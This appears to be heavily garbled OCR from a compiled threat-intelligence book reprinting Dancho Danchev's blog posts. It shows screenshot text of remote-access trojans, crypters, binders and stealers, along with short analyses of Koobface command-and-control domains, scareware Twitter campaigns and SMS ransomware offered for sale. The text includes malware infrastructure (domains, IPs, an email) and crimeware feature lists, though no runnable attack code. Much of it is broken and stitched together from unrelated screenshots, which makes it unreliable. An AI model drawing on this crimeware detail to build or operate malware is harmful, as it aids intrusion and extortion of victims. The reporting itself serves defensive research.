FileN ame Size Extension 
© C:BIND'Help 1485.hip 119 KB -hip 

= CABIND‘read_my.txt 1KB txt 

| CABIND\catsrvut.dll 613 KB alll 

4] C\BIND\CC3260MT.DLL 1465KB  .DLL 

| C\BIND\certcli.dil 195 KB alll 
™]C:\BIND'RPG_2000-Prince... 2.011KB  .exe 

| CABIND twain.dll 92 KB dll 

| C\BIND'twain_32.dll 49 KB dll 


< 
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£ Rub3 ¥4.1 PR [Private] - www.aspack7.com = 


TTEREIITy, 


v| Activate Alerte Message 


or 


Type: Exclamation 


Title : 
Rub3 


Message: 
Application has lunched succefully ! 
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£ Rub3 ¥4.1 PR [Private] - www.aspack?7.com = 


G25mnBfe £8007 
Performence 


Speed Security 


73% 


Encryptions Additional Options 
Aspack/? Encryption 64 
Aspack7 Encryption 65 


Enryption Jack2 by cyft 
rebates damned my Crypt sources functions/api 


CFE crypt by cfe v| Crypt icon(s) 
v| Crypt ressources(s) 


Key: ARARARADAAAARR ABA RABE 
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Syn Spy 1.0 Private 


=| Main Setting's aan 

8 Connexion Setting's ee 
StartUp Setting's Log Setting's 

a FTP Test Server Name : Server_O1 


Read Log's Logs Path : C:\Logs {No File Type} 
«) Create Server 


© About Log File When Size: 20 Kb 


Recoard Setting's 
Recoarding Selected Options : 


Malfakeys MPayNumKeys MSymboleKeys MeExtra Keys 
Merxkeys (1) Secondary Keys 


Encryption Setting's 
Password ; 123456789 Hello World 


Retype: 123456789 


Test Text : Hello World 
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Qcontiot-w: 1270.01 


Status|Folderisi / File(s) Listed : C New Directory) 


: lolol 
contro -P: 127.0.0.1 |) mS 


Size Type 

1024 bytes RIND Dosyasi 

204 KB Uygulama 

O bytes MS-DOS Topi I... 
9,58 KB Metin Belgesi 

211 bytes Yapdandrma Ay... 
4,84 KB VLC media file (... 
O bytes Sistem Dosyast 
748 KB 000 Dosyas: 

964 KB 000 Dosyasi 

1,02 MB 000 Dosyas: 
287,5 KB Uyguilama 
S1,SKB Uygulama Uzanisst 
38,61 KB Firefox Document 
88 KB Uygulama Uzanisi 
O bytes Sistem Dosyasi 

O bytes Sishern Dosyast 
46,45 KB MS-DOS Uyguis... 
244,69 KB Sistem Dosyast 


28.12.2008 15. 
12.12.2004 18, 
01.08.2008 15. 
23.07.2002 22 
01.08,2008 15. 
27.03.2004 23, 
01.08.2008 15. 
10.12.2004 20. 
10.12.2004 20. 
12.12.2004 18. 
10.12.2006 03. 
10.12.2004 20, 
10.12.2004 20, 
10.12.2004 20. 
01.08.2008 15. 
01.08.2008 15. 
14.04.2008 17. 
14.04.2008 19, _ 


Aktributes 
A 
A 
A 
A 
HS 
AHSR. 
A 
A 
A 
A 
A 
A 
A 
A 
AHSR. 
AHSR 
AHSR, 
AHSR, 


StatusfFolderis} / Fiteis} Listed : Co} 
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@ controt -P: 127.0.0.1 


* Managers IC:\<Fixed> | ch > 
4 (& File Manager 
(| File Search 
Total Directories: 14 TotalFies: 31 
Directory Name File Name See Type Attributes Last Modified + 
J Documents and Settings rnd 1024 bytes RRND Dosyasi A 28.12.2008 15. 
() Downloads Ja0Anslyze.exe 204 KB Uygulems A 12.12.2004 16. 
J DriveKey ) AUTOEXEC, BAT O bytes MS-DOS Toplul... A 01.08.2008 15. 
LA DRIVERS beta. txt 9,58 KB Metin Belgesi a 23.07.2002 22. 
(uFFa 08 aa 11 bytes Yapdandema A HS 01.08.2008 15] 
J FIFAOS Bootfont. bin 4,34 KB VLC media file (...  AHSR 27.03.2004 23. if 
Lal images ae CONFIG.SYS O bytes Sistem Dosyasi A 01.08.2008 15. 
Lo Inetpub dati.000 746 KB 000 Dosyasi A 10.82.2004 20. 
Intel dak2.000 964 KB 000 Dosyasi A 10. 12,2004 20. 
|) Program Files dat3.000 1,02 MB 000 Dosyasi A 12,12,2004 18, 
(J Server ~~ fairuse4wm.exe 257,SKB Uygulama A 10.12.2006 03. 
J YTP Files qe ForceDtL.dl $1,5 KB Uyguiama Uzantis: A 10.12.2004 20. 
| Westwood @ help.htrd 33,61 KB Firefox Document A 10.12.2004 20. 
(| winoows gp hook_30A.di 83 KB Uyguiama Uzanites: A 10.12.2004 20. 
ao lO.S¥S 0 bytes Sistem Dosyasi AHSR 01.06.2008 15. 
aa MS005.57S O bytes Sistem Dosyasi AHSR 01.08.2008 15, 
NTDETECT,COM 46,45 KB MS-DOS Uygula... AHSR 14,04,2008 17, 
nithdr 244,69 KB Sistem Dosyasi AHSR 14.04,2008 19. , 
” + 


Status[Folder(s) | File(s) Listed : Co] 
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&> Syn MSH Remote Stealer 1.0 


Password 


[ > Edit Server ] \ee@® About Port: 1604 | Stop Listening } 
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face worm’s captcha7.dll component in action: 
rd040609-cgpay .net/cap/?a=get &i=1 &v=7 
upr0306 .com/cap/?a=get &i=2 &v=7 
rjulythree .com/cap/?a=get &i=3 &v=7 
uthreejuly .com/cap/?a=get &i=4 &v=7 
er20090515 .com/cap/?a=get &i=0 &v=7 


In this particular case, obtaining the CAPTCHA image from nua06032009 .biz/cap/temp - 
218.93.202.50 Email: kfmnmkswrnkcxlgpfdxb68@gmail.com. 


A [13]complete list of command and control domains courtesy of FireEye, is once again 
emphasizing on the fact that the Koobface gang may be aware of each and every malicious 
traffic acquisition tactic there is, but has centralized their infrastructure making it easy to deal 
with it. 


Who's providing them with the hosting infrastructure? 

218.93.202.50 - China Beijing Chinanet Jiangsu Province Network 

98.143.159.138 - United States Los Angeles Oc3 Networks & Web Solutions Llc 
78.110.175.15 - Russian Federation Limit-surehost-ip/UK Dedicated Servers Limited 
61.235.117.71 - China Shenzhen China Railcom Guangdong Shenzhen Subbranch 
119.110.107.137 - Malaysia Kuala Lumpur Tm Net Sdn Bhd 


Compared to the money they make out of scareware, since they diversify on multiple 
revenue-generation fronts, they money they pay for the anti-abuse hosting looks like pocket 
change. 


Related posts: 

[14]Dissecting the Koobface Worm’s December Campaign 
[15]Dissecting the Latest Koobface Facebook Campaign 
[16]The Koobface Gang Mixing Social Engineering Vectors 


Ukrainian "fan club" and the Koobface connection: 

[17]Dissecting a Swine Flu Black SEO Campaign 

[18]Massive Blackhat SEO Campaign Serving Scareware 

[19]From Ukrainian Blackhat SEO Gang With Love 

[20]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[21]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scriobd Accounts, and Black- 
hat SEO Farms 

[22]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [23]Dancho Danchev’s blog. 


1. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 
2. http: //en. wikipedia. org/wiki/Cyrillic_alphabet 

3. http: //img386. imageshack. us/img386/2569/phpinjected. jpg 

4. hetp://status.itter.con/post/1567S0061/aooptace-nalvere e070] 

5, htep:/ /ologs.2dnet.con/security/"p=1696 

6. : ; ; 

7. : 
8. 


ttp://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.htm 
ttp://ddanchev. blogspot .com/2008/07/template-ization-of-malware-serving.htm 
ttp://ddanchev.blogspot.com/2009/06/from-ukraine-with-scareware-serving.htm 
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ry 


Config Setting 


Rematk i CPU 
2 DRAT 192.168.1.33 sXP Se... Intel) Core(TM)2 Duo CF 


This ls DRAT Remote Soft 
©sits @ NewSever 


Delete Me VY) Compress 


| > loon resources into the success of the 
> Server pathF: VABNRRR CE DakStRanORAT 2008 26% z 
WB \Chlers\Server 
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Gres Betatest 


127.0.0.1 


Client Created{Port 3113 - Mandie 2099370) 


@Qconuot- PY: 127.0.0.1 


(D4 File Search 
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192.168.85.1 WIRRUS Admin 
[273] 
oc). 
Mask : 
* ini ~ 
[V] Inchsde Subfoider 
Sie Aktributes Last Modified Path a 
211 bytes HS 01,08.2008 15:47:28 Cy a 
178bytes = HS 02.01.2009 22:46:53 C:\Documents and Settings|Admin) = 
1,05 K8 u 04.08.2008 17:32:42 C:\Documents and Settings\Admin\Conta. 
346 bytes A 31.10.2008 22:14:58 C:\Documents and Settings\Admin\Deskt, 
S68 bytes A 20.11.2006 02:31:58 C:\Documents and Settings\Admin\Deskt. 
173 bytes A 11.11.2006 20:51:04 C:\Documents and Settings\Admin\Deskt. 
152 bytes A 25.10.2007 01:21:26 C:\Documents and Settings\Admin\Deskt. 
289 bytes A 27.12.2008 19:30:26 C:\Documents and Settings\Admin\Deskt, 
O bytes A 09.08.2008 15:59:54 C:\Documents and Settings\Admin\Deskt. 
O bytes A 09.08.2008 15:59:54 C:\Documents and Settings|\Admin\Deskt. 
588 bytes a 25.10.2008 20:12:24 C:\Documents and Settings\Admin\Deskt. 
751 bytes A 13.08.2008 13:33:36 C:\Documents and Settings\Admin\Deskt. 
173 bytes A 19.02.2002 18:43:00 C:\Documents and Settings\Admin\Deskt, 
13,49 KB A 25.05.2002 13:40:40 C:\Documents and Settings\|Admin\Deskt, 
14, 1SKB A 08.02.2002 13:30:56 C:\Documents and Settings|\Admin\Deskt. 
13,19KB A 25.05.2002 13:37:22 C:\Documents and Settings\Admin\Deskt. 
= : iene = Ss 
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iCrypt File 


iCrypt by omc 
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_ [EsDocuments and Settings Administrateur 


Host Name: My Host 
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‘) Message 
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cc 
Select Intertace fi 92.168.1.69 x] start Credits 


Erwin L. 
My Ganjadealer 


Sniffed 20 packets] 


http: //rapidshare.com’files/174 
http: //rapidshare.com’files/174 
http: //rapidshare.com’files/17472 
http: //rapidshare.com’files/1713 
http: //rapidshare.com’files/1713 
http: //rapidshare.com’files/1713 
http: //rapidshare.com’files/174 
http: /“/rapidshare.con’files/17472 
http: //rapidshare.con’files/1747 23 
http: /“/rapidshare.com’files/’17133 
http: /“/rapidshare.com’files/17472 
http: //rapidshare.com’files/1747 2% 
http: /’/’rapidshare.com’files/174727% 
http: //rapidshare.com’files/1713 
http: //rapidshare.com’files/17133 
http: //rapidshare.com’files/17134 
http: //rapidshare.com’files/17472 
http: //rapidshare.com’files/17133 
http: //rapidshare.com’files/17472% 
http: //rapidshare.com’files/17472#8 
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File Setting Languages Help 


@aaGé8&-+0 if 0 


VpDateIp Config Setting Session Dilfanage Download Uninstall About 


-Hosthist | 
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DST update IP | DRS update IP | FTP update IP | 


Server: 127.0.0.1 Port: 21 
User: FIPUser 


Operation 
Address: 192.168,1.110] 
Auto Save Auto IP 
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. http: //ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving. htm 


14. http: //ddanchev.blogspot . com/2008/12/dissecting-koobface-worms-december . htm 
15. http: //ddanchev.blogspot .com/2008/11/dissecting-latest-koobface-facebook.htm 


://ddanchev . blogspot . com/2008/12/koobface- gang-mixing-social-engineering.htm 
://ddanchev . blogspot .com/2009/05/dissecting-swine-flu-black-seo-campaign.htm 
://ddanchev .blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. htm 


://ddanchev . blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 
://ddanchev . blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


://ddanchev . blogspot . com/2009/06/from-ukraine-with-scareware-serving.htm 
://ddanchev . blogspot . com/2009/06/fake-web-host ing-provider-front-end-to.htm 


23. http: //ddanchev. blogspot .com/ 


5.7.7. 4th SMS Ransomware Variant Offered for Sale (2009-07-16 18:48) 


BAW WINDOWS 3ABNOKUPOBAH 


Bceasu CmvMorowecnenmenH mupatcxunm Konan OS "WINDOWS" 
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fuueHaHoHHOro MO Bb CHOKeTe nponomKers pasoTy 8 npexHer 
perate. 

Dina oxtweeunocecotnperste SMS c rexcrom Som] 40 
HomMep MP & oTset Bom OuneT MpemoctoBneH KON oxTHBOUHH 
Crounmocts SMS cooGwersea He Npesiwoert 35 pysnen 


=e ee ee 
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Locking down an infected Windows-based host and demanding a premium rate SMS mes- 
sage for the unlock code ([1]SMS Ransomware Source Code Now Offered for Sale; [2]New 
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Ts CN\Documerts and Settings QUANDRIA\My Documents \LimeViire \incomplete 
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& 1-209638084-Brazzers - Teens Lice t Big - E.. C:\Documents and Settings QUANDRIA\My Documents \Lime Wire \incomplete 
. C:\Documents and Settings QUANDRIA\My Documents \Lime Wire incomplete 
C\Documerts and Settings QUANDRIA\My Documents \Lime Wire \incomplete 
C\Documerts and Settings (QUANDRIA\My Documents \Lime Wire \incomplete 
C\Documerts and Settings \(QUANDRIA\My Documents \Lime ire \incomplete 
C:\Program Files \Hewlett-Packard\HP Quick Launch Buttons icons 
C:\Program Files \Hewlett-Packard\HP Quick Launch Buttons icons 
C:\Program Files Hewlett-Packard \HP Quick Launch Buttons \icons 
C:\Program Files \Hewlett-Packard\HP Quick Launch Buttons icons 
C:\Program Files \Hewlett-Packard\HP Quick Launch Buttons icons 
C:\Program Fies\Hewlett-Packard\HP Quick Launch Buttons\icons 
C:\Program Files\Roxdo\Roxo MyDVVD Basic v9\VideoU! S\AET 
C:\Program Files\Roxo\Roxo MyDVD Basic v9\VideoU! S\AET 
C:\Program Files \Roxdo\Rixco MyDVD Basic v9\VideoU! S\AET 
C:\Program Files\Raxo\Roxdo MyDVD Basic v9\VideoU! S\AET 
C:\Program Files\Rono\Roxdo MyDVD Basic v9\VideoU! S\AET 
C:\Program Files\Raxo\Rexo MyDVD Basic v9\VideoU! S\AET 
C:\Program Files\Raxdo\Rexdo MyDVD Basic v3\VideoU! S\AET 
C:\Program Files\Roxo\Rexdo MyDVD Basic w9\VideoU! S\AET 
C:\Program Files\Raxo\Roxio MyDVD Basic w3\VideoU! S\AET 
¢: \Program Fies\Rondo\Roxso MONO Bosic WaNideoUt S\AET 


—— no ne 
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Monday. January 26 7.24PM 
Monday, January 26 10:26PM 


Monday. January 26 4.25PM Language: French - 
Monday. January 26 10:42PM Language: Engish 
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Tuesday. Jenuary 27 10.46AM Language: English - 
Tuesday. January 27 10. 154M Language: English 


Tuesday, January 27 2:20AM Language: English 


Language: Potuguese « Country: Br 
Language: Dutch - Country: Netheds. 
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The ELza Remover administration tool coded by tOxlc 
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The ELza Remover administration tool coded by tOxlc 


Key-l 
Serean-shot 
Webcam 
A\icrophone 
ClipBoard 
PC-Info 
Regedit 


Password 


Builder server 


[293] 


Open file to protect 3% 
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Status : Password Extract(48 sec) 
Hide password 


@ About | Protect 
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When i shutoff/restart pc this window pop up. 
If i click on End Now, the pc will turnoff/restart normal, but 
then the spynet server will not start again. 


Same thing happends when inject to explorer.exe 


End Program - svchost.exe 


(7) Erdna Pecan. Pease wat 
iis 


plosrke decal atiselecentnee ty wil lose 
ary unsaved data. To end the program now, chek End 
Now. 


If i wait for pic 1 to finish. Then this new End Now or Cancel 
appair. If i click End Now The pc turnoff/restart normal. And 
now the spynet server start normal too. 


The same ting happends when inject to explorer.exe 


End Program - svchost.exe x 


- This program is not responding. 


To retuin to Windows and check the status of the 
program, click Cancel. 


If you choose to end the program imenediately, pou wil lose 


ey Unease dete To anal te pore nems coe Ene 


End Now | Cancel | 
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GMailer Beta 
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To: thehundreds.com@gmail.com 


(fjBody: 
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Your Just-in- Time Debugger is currently set to ‘C:\Program Files\Microsoft Visual 
Studio\Common\MSDev98\ Bin\msdev.exe" -p %ld -e %ld". In order for Just-in-Time Debugging and Distributed 


Debugging features to work correctly, it needs to be changed to: ‘C:\Program Files\Borland\Delphi7\Bin\bordbg/0.exe” 
-aeargs %ld %ld'. Do you want to change this setting? 


T~ Don't ask me this again 
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ransomware locks PCs, demands premium SMS for removal; [3]3rd SMS Ransomware Vari- 
ant Offered for Sale), is slowly [4]becoming a trend, that despite its current geographical 
prevalence evident in Russia, it could easily become an international issue due to the [5]cost- 
effective localization services available on demand these days. 


Yet another SMS-based ransomware variant is offered for sale ( $10), making this the 
3rd such variant available for purchase during the past couple of months. The author appears 
to be a Moscow-based opportunist, clearly interested in making a quick buck and lacking any 
long-term ambitions - at least for the time being. Despite that the message and the visual 
interface can be changed on request, the default version is once again insisting that Microsoft 
locked down this copy of Windows because it detected it as pirated copy, and in order to 
unlock it the user has to send an SMS in order to receive the unlock code. 


What bothers me is not the potential "spread-ibility" of his campaigns that is if he turns 
into a user of his own code, but how easily and cost-effectively his customers can push the 
ransomware to a huge number of already infected malware hosts. 


This post has been reproduced from [6]Dancho Danchev'’s blog. 


1. ft ep: //adanchev. blogspot. con/2009/05/sns~ransomvare~source-code-now- offered. tal 
2, http: /elogs.zinet .con/security/?p-3197 

3. http: //ddanchev. blogspot. com/2009/05/2rd-sns-Fansoavare-varlant-offered-for heal 
4, http:/ /ddanchey. blogspot .con/2009/07/ Legit inate- eof tware-typosquatted~in-ens. html 
5. http: //ddanchev. blogspot . com/2008/11/localizing-cybercrime- cultural .html 

6, http: //ddenchev. blogspot. con/ 


5.7.8 From Ukraine with Bogus Twitter, Linkedin and Scribd Accounts 
(2009-07-16 22:57) 
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a 2a) See 
| foxomotee | 


| cKO Gekehenee 


Qo: 21020108 


CJ Icons 


~ Settings. ini 
= Configuration Settings 


3 KB 


a) New Folder 


24246 


- plugin. dat 
eo GOM Media files{, dat} 


‘DATA 287 KB 


Spy-Net [RAT] 


a) La Loe Lx) LoL | La Lee bf 
rs Ss 7.) 


eC: 


~ 
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Language connect.way 


, a Config.spynet 
( spynet.exe FF SPYNET File 
HH 291 KB 
= Spynet-Server.exe %| 


Funcoes.dll 


You install the server of the Spy-Net on your c 


‘omputer 
&t the end of the Remote Assistance, click "OK" to uninstall the server from your computer. 
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- CIA - Microsoft Visual Basic [run] - [Form (Code)] 


[Efe EaR Yew Broject Format Debug Bun Query Djegram Tools Add-ins Window Help 


1A 1.3 
Frog ammed By Ak 


www .Cruer iviensio 
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Bestand server.exe ontvangen op 2009.05.12 19:09:31 (CET) 


}@4 Geformatteerd 
Antivirus 
a-squared 
AhnLab-V3 
AntiVir 
Antiy-AVL 
Authentium 
Avast 
AVG 
BitDefender 
CAT-QuickHeal 
ClamAV 
Comodo 
DrWeb 
eSafe 
eTrust-Vet 
F-Prot 
F-Secure 
Fortinet 
GData 
Ikarus 


K7AntiVirus 


Huidig status: 


Resultaat: 0/39 (0%) 


Versie 
4.0.0.101 
5.9.0.2 
7.9.0.166 
2.0.3.1 
5.1.2.4 
4.8.1335.0 
8.5.0.327 
7.2 

10.00 
0.94.1 

1157 
§.0.0.12182 
7.0.17.0 
31.6.6501 
4.4.4.56 
&.0.14470.0 
3.117.0.0 
19 

13.2.3 549.0 
7.10.732 


[309] 


Laatst gelipdatet 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.08 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.12 
2009.05.11 


Resultaten afdrukken & 


Resultaat 


m. Venomous Ivy -- By SqUeEzEr 


; Settings | Log 


- Settings 


Ip Adress |255,255.255.255 


¥| Startup Path: C:\WINDOWS\ 
With ActiveX key: {¥479C6D0-OTRW-U5GH-S1LEE-E0ACLOB4EE 


- Advanced 


|¥| Unhook Usermode API's 


\v| Create Critical System Process 


[ Build Server ] 
Note: Port is 3460 | 
Copyright © 2009 SqUeEzEr 
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FFFFFFF 
FFFFFFF 
FFFFFF 
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[2 Syndrome Binde 


FileName File Type Size 
c:\Program Files\uTorren,.. Application 263,83 KB 
©:)\Program Files\uTorren... Application 726,07 KB 
| ‘\Program Files\CodeBl... Application 857 KB 
‘\Program Files\CodeBl... Extension del'application 9.75 MB 
ra ‘\Program Files\HHD So... Application 832,05 KB 
‘\masm32\qeditor,exe Application 26,7 KB 
r) ‘\Program Files\Delphi?... Application 562 KB 
‘\FASM\FASMW.EXE Application 120 KB 


Fae EGn Seorch View Reflector Preyect Run Compeset Teo Window Help DCm utoset 
o.-.> =, @ 


1f4 


ows wreicome Page (reiirserve S)0pton Spoptartere Shsyun Spuntuatin Sperry 
© Gecected © but receved F at ine a me: & = * = 
PROCEDURE TileSearch (CONST soot, sFileEXT: STRING: COMST strBecursive: Boolean): 
vA 
WFD: TWind2FindDece: 


Bfile: Thandie: 


=: TDL; +" 
Pethhtch: PMSpeck: @ 0D maldeserverexe 
acorm @ Odi Cotgrmoa 


= r= LosdDli(*shiveps.ali"): 
OPatncten 1- Secadsrese it, 'Fernmarenspesd’)! 
If @Pathktch <> WIL THEN BEOIN 
BYile 1+ FindFiretPilek(Mrigecnar(eReot + ‘*'), HED)r 
WHILE FindlextTale# (efile, HTD) OO IF (HTD.cwFileAccrabotes AMD i¢) = l¢ Taw 
(IE eteBecursive THES IF Copy (STRING(NTD.cfilewame),i.3) <> *.' THEM FileSearchi(sBoct + STRIMG(NTD. crile® 
f Rise 
SUEDeOTOR I STESearen + Shoot + STRIMGINTD. oT aletame) + varDels 
Findclese (h¥ile): 
Treeloeadii (hy: 


Perret 
FURCTICN GetFileSize (COMST strFileltame: STAIN): 
WAR WFO: TWand2fincDete; AFile: Thandie; 
Sec 
thr 
Bile i FindFiretfileA(PChar(strlilelame), WFD): 
Peruit + UTD. efiiesizeiow 
TincClose (hFile): 
=xcurr 


Baente om he 
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16-pa3paguaa nogcuctema MS-DOS | 


D:\downiRATS\ARABIA~1 ,O\Server.exe 
fh Pipoueccop NTVDM ofHapyxnn HeagonyctHMyto HHCTpYKUHIO. 
CS:0fF7 IP:0113 OP:Of 07 03 01 O7 Ana saBepwerHA paboTe! NPHNOKEHHA KAKMHTE KHONKY “SaKpeiTe”. 


Users 
e 


[315] 
24251 


& Arabian-Attacker ¥1.2.0 


[316] | 
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Hey there! CarmenElectraPN is 


Twitter is a free service that lets you keep in touch with people through Bem vow shone? CBS hee 
the exchange of quick, freq answers to one sample question: What 
are you doing? Join today to slart receiving CarmenElectraPN’s 


updates 


it! CarmenElectraPN 


Carmen Electra pean HERE - CLICK 
ON THE WEBSITE LINK ON MY 
PROFILEMHIMIMITHHIUINIMIE OKI 


SLE Bed: ten! 
Bs; Oka 
ies ow 


Could a dysfunctional abuse department facilitate cybercrime? Appreciate my rhetoric with 
an emphasis on Layered Technologies, Inc. 


Exactly one month ago, [1]the Ukrainian gang that I’ve been extensively monitoring due 
to their apparent involvement in literally each and every malware campaign targeting Web 
2.0 properties - that’s of course next to [2]the Koobface connection in general - intensified 
their [3]Jautomatic abuse of Twitter, Scribd and LinkedIn using plain simple social engineering 
tactics. 


2428 
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phpinfo() - Windows Internet Explorer 


GO - Dree:imcaronyi2ezived demediestationos ste 


saacen tes |" 
ped |" 
Pa APL | 
Pu Exension | 
peweus | 
Tread Stet 
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=) pode Pete 


Ws hea, Pa Pak Pada ral | Frafea| Ss 


Himes: | ake: fee: | Bm 


fz] 
> 


Cie >) ff |G ae Soran: B | Deen) Bama) 
oneal 2 a FRR: 7 ee 
mH Oo © YI 
2334242 | PAUCEVUWVsS | 


i} Zaz) Ese > of 
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(Untitled) - Wireshark - (ox 
File Edt Yew Go Capture Analyze Statistics Help —- 
Bwaee Saxea re Poot 2 (ES) QQQn\eBSx\a 


Bhar | __] 7 _Brpression... Gear apely 


ee | eo 


Type: IP (Ox0800) 
| Internet Protocol, Src: 10.0.0.16 (10.0.0.16), Dst: 10.0.0.1 (10.0.0.1) 
version: 4 Ly 
Header length: 20 bytes 
& Differentiated services Field: Ox0O CDSCP 0x00: Default; ECN: 0x00) 
0000 00.. = Differentiated Services Codepoint: Default (0x00) 


sees «0. = ECN-Capable Transport (ECT): 0 ¥ 

: ——_—— — ————— = 2 
0000 00 14 7f 39 98 7d 00 “OL 02 Oa 42 9a 08 OO 45 00 Saeeaiow sobsveas 

0010 00 42 06 05 00 00 80 11 20 96 0a 00 00 10 Oa 00 sSixanccevet . Granatwnerar 

0020 00 O01 04 01 00 35 00 2e 57 f3 68 20 01 00 00 01... S.5 WA aaa 

0030 00 00 00 00 00 00 Oa 73 70 79 6e 65 74 2d 72 61 eeeeeeeS pynet-ra 

0040 74 05 6e 6f 2d 69 70 03 Gf 72 67 00 00 O1 00 01 = t.no-ip. org..... 

Fie: CDOCUME--11Grimnm\LOKALE~ emp etherOxx.a02656" (93 KB £3525 Pacners: SUUL Displayed: SU Profte: Def aur 
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PAdew Pon onngetes the OS ‘Keen Revobe cow 


(angpeage Active Capon 
urease ma SERVER-Adeemn Windows XP S Lew AMD Athbore® Frances (France) Syedeonne Rew 


ties Wating Lntemng Pot ies Server) b CPU Usage | I RAM Used 442 MB /1535 MB “ns 


Chere General Setmeny’s 
Sh Stirs 3 
‘ . \ Pegutry tater 4 VIB Monster Semin Manager © Printege Manager 
tratte Sateber = ves 0 we teow F 
eee attrgs B Fee feretener 
Cratie Theme 


Wed Steater 
@ Fors the 


Custom theme 

7 Crabie Tray Optore 
Mewice to Tray: «YES 
4 thable Baboon notification 


Repeat number of connected 


beerval | Se 


bent Genesal Sette 
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Name 
vs cmuninst, dat 


|d@|cmuninst.exe 
\_J Config 


(J Connection Wizard 

co control. ini 

Cj Cursors 

i Debug 

(> desktop. ini 

eo {Downloaded Program Files 
(J Driver Cache 


(J ehome 


=| err.txt 


ys explorer.exe 


ey explorer .scF 


i] Fonts 


\ Groensteen.bmp 


J Help 


ed hh.exe 


Type 

GOM Media file, dat} 
Toepassing 
Bestandsmap 
Bestandsmap 
Configuratie-instellingen 
Bestandsmap 
Bestandsmap 
Configuratie-instellingen 
Map 

Bestandsmap 
Bestandsmap 
Tekstdocument 
Toepassing 

Windows Explorer Command 
Bestandsmap 
Bitmapafbeelding 
Bestandsmap 


Toepassing 
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Size 
132 KB 
136 KB 
0 bytes 
O bytes 
O bytes 
O bytes 
O bytes 
2 bytes 
O bytes 
O bytes 
O bytes 
192 bytes 
1,62 MB 
80 bytes 
O bytes 
25,96 KB 
O bytes 
140,5 KB 
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[NEW] LOST DOOR V4.0 PRO 1ST JULY 2009 


@ Actually working on version v4.0 Pro which will be ready The 1 st July 2009 it 
will have some new features as Msn Spreader & some new updates more 
information are avalible in the.::Forum::. 


LOST DOOR V3.2 STABLE (BUILD 2) 


Lost Door v3.2 Stable (Build 2) has done and ready to be downloaded 
Whats New : 

[+] Remote Nat viewer 

[+] Remote Resotre Manager 

[+] Added Some Graphics 


fal Game minor Gune fived 
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‘Sin | Main Board | News | 


0. System Time ‘Wan \ IP 
ESET NODS2 Antivirus 4.0 ‘Windows XP 00:01:38 127.0,0.1 


# Connect 

oP Creat Server 
(2 Start Listening 
@Hide 
@Desconnect 


2009/2/5 11:48:3 
2009/2/5 11:45:4 
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frmMain (Code) 


SubSevenTeen v.10 by LinuZ_ 
ion Explic 


ipfuin: |127.0.0.1 oot 11337 Sanne 
rate Funct 17 elle ( ieedallll connect 


numberNex 


ae welcome to SubSevenTeen 1.0 
igPrint ( 
i= 0 To this is just a goddamn ripoff by LinuZ_ and | 
bat esa got no idea what to write in this box... well, it 
bb(i) = has to be filled atleast--' 
bm(i) .Vis 
debugPrin 
E click the 'read latest Sub1? news' to read 
the latest news 
ioOrNot = 
j = numbée 
b(3) .Top cyal 
read latest Sub? ney 
»tnNumber) 
>tnNumber) . ? version 1.0 ready 
»tnNumber) 
If 


a 
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SubRipped by DarkCoderSc 0 0 Fuzzzzzy 
destination: || port: | 100 connect 


pmease- Ss v0ABE ahh eeee: 


Subseven is it ripped ?!! WTF 


ready. vixx 0:00:00 SubSeven 2.2 overall: néa 
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Hey there! LilKimUncensord is 
using Twitter. 


f = Twitler is a free service that lets you keep in touch with people through 
the exchange of quick, frequent answers to one simple question: What 
are you doing? Join today to start recernming LilKimUncensord's 
updates 


S * £4 “2 Sk ie 2 2 


Name Lil Kim uncensored 
Location Holywood 


A LilKimUncensord Web tit. unt 


214 3,608 
Solewns tokowers 


Updates 1 
Lil Kim uncensored HERE - CLICK Favores 
ON THE WEBSITE LINK 
http://oymomahon.com/fathul... regeR” 


: SRSA 
WATE Ss oo Bi 


Since the campaign seems to be ongoing, it’s time to spill some coffee on their latest 
scareware domains, see how the campaign’s quality degraded upon notifying the affected 
parties, and emphasize on the fact that since Layered Technologies, Inc. abuse department 
wasn’t available for comment prior to this post, the Ukrainian "fan club" continues using their 
services. 


Hey there! KimKardashian11 is 
using Twitter. — 


Twitter is a free service that lets you keep in touch with people through hom vow onene? CHa Reve 
answers to one simple stion: What 
Going? Join today to start receiving KimKardashian11's 


Name Kim Kardastean nude 
Location Hollywood 
Web htp.i unsate | 


20 342 
fetomng fokowers 


Updates 


Kim Kardashian nude HERE - CLICK Fendes 

ON THE WEBSITE LINK 

BELOW! TTETTETENTEITTNTE ok! Following 

http://bit.ly/Je2Sd =—i ne 1S 
Beh any 
OAs Baw 


Bogus Twitter accounts serving scareware part of their campaign: 
twitter .com/carmenelectrapn 


2429 
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Total reports in database: 0 


Tota! active bots in 24 nours: 
Minima! version of dot: 
Maximal version of bot: 
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= Unremote File Compressor 1.0 


File Name Name 


Output FileName: ci\helopackzip 


Add a comment ? 
Bored 


24263 


PP ="s 


= Unremote File Compressor 1.0 


File Name 


@ ape 


Output FileName : c:\hellopack.zip 
Add a comment ? 
Bored 


[_]Use password 
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© Windows Task Manager 


aleniechang 


Net over’ 


fewerdrgen Proceive erator femerdrger Proceme Sy hemienhs 


Pt 


feslatrg —— Verlad der PU tasalactung 


FU funkasburg Verlod der CP 


ta rhenger Depebaties 


Verid Cer Aesedinger repel mm cetera) 


Pteywhalacher Spmcher (iD 


regetamt 
Hanches 7s i 
Threads ™m ‘ 
Procewe «72 


ugematerter Scewher (VE Kerneb Soecher (KP 


wpsaertiee Sgescheet (KE) r] 
beget 430092 regesane ireperent 1 
Gronewvert LEE Aegellogert Grerenet 4 
Ma rabeert 0092 Nicht aungelagert Machnaert amen 


\ 


Prowesen: 472 Pu sastemung 100% Dageschertier Seater: 435M 
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z Beta 
Mark Saciirihy Taam 
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("Gd DRAT 2009 English . bee 'g a= oy) 
File Setting Languages Help 
